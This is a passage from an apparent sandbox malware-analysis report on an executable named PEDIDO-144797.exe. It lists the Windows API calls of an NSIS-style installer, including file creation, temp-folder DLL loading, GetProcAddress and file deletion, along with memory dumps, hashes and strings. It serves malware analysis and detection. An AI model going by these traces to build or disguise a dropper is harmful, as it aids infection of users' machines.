  • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
  • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
• GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
• wsprintfA.USER32 ref: 0040607B
• GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
• SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
• GlobalFree.KERNEL32(00000000), ref: 00406164
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
  • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405EA6
  • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                          • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                                          • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                                                                                                          • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                                          • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                                                                                                          APIs
                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                          Strings
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-3933841003
• Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
• Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
• Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
• Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004043C9
• GetSysColor.USER32(00000000), ref: 004043E5
• SetTextColor.GDI32(?,00000000), ref: 004043F1
• SetBkMode.GDI32(?,?), ref: 004043FD
• GetSysColor.USER32(?), ref: 00404410
• SetBkColor.GDI32(?,?), ref: 00404420
• DeleteObject.GDI32(?), ref: 0040443A
• CreateBrushIndirect.GDI32(?), ref: 00404444
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
• Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
• Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
• Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
APIs
• lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
• lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
• lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
• SetWindowTextW.USER32(00422708,00422708), ref: 00405481
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
• SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
• Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
• Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
• Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
• GetTickCount.KERNEL32 ref: 00402EAB
• wsprintfW.USER32 ref: 00402ED9
  • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
  • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
  • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
  • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
  • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
  • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
  • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
• CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
• ShowWindow.USER32(00000000,00000005), ref: 00402F0B
  • Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,000600F3), ref: 00402E6B
Strings
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
• Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
• Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
• Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
• GetMessagePos.USER32 ref: 00404D01
• ScreenToClient.USER32(?,?), ref: 00404D1B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                          • String ID: f
                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                          • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                          • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
APIs
• GetDC.USER32(?), ref: 00401DB6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
• MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
• ReleaseDC.USER32(?,00000000), ref: 00401DE9
• CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Tahoma
• API String ID: 3808545654-3580928618
• Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
• Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
• Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
• Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
• wsprintfW.USER32 ref: 00402E29
• SetWindowTextW.USER32(?,?), ref: 00402E39
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
• Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
• Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
• Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
APIs
  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
• GlobalFree.KERNEL32(?), ref: 1000256D
• GlobalFree.KERNEL32(00000000), ref: 100025A8
Memory Dump Source
• Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
• Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
• Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
• Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
• GlobalFree.KERNEL32(?), ref: 00402950
• GlobalFree.KERNEL32(00000000), ref: 00402963
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
• Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
• Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
• Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
APIs
• lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
• wsprintfW.USER32 ref: 00404C7A
• SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$(7B
• API String ID: 3540041739-1320723960
• Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
• Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
• Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
• Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp$C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll
                                                                                                                                          • API String ID: 3109718747-1120868966
                                                                                                                                          • Opcode ID: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                          • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                                                                                          • Opcode Fuzzy Hash: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                          • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                                                                                          APIs
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
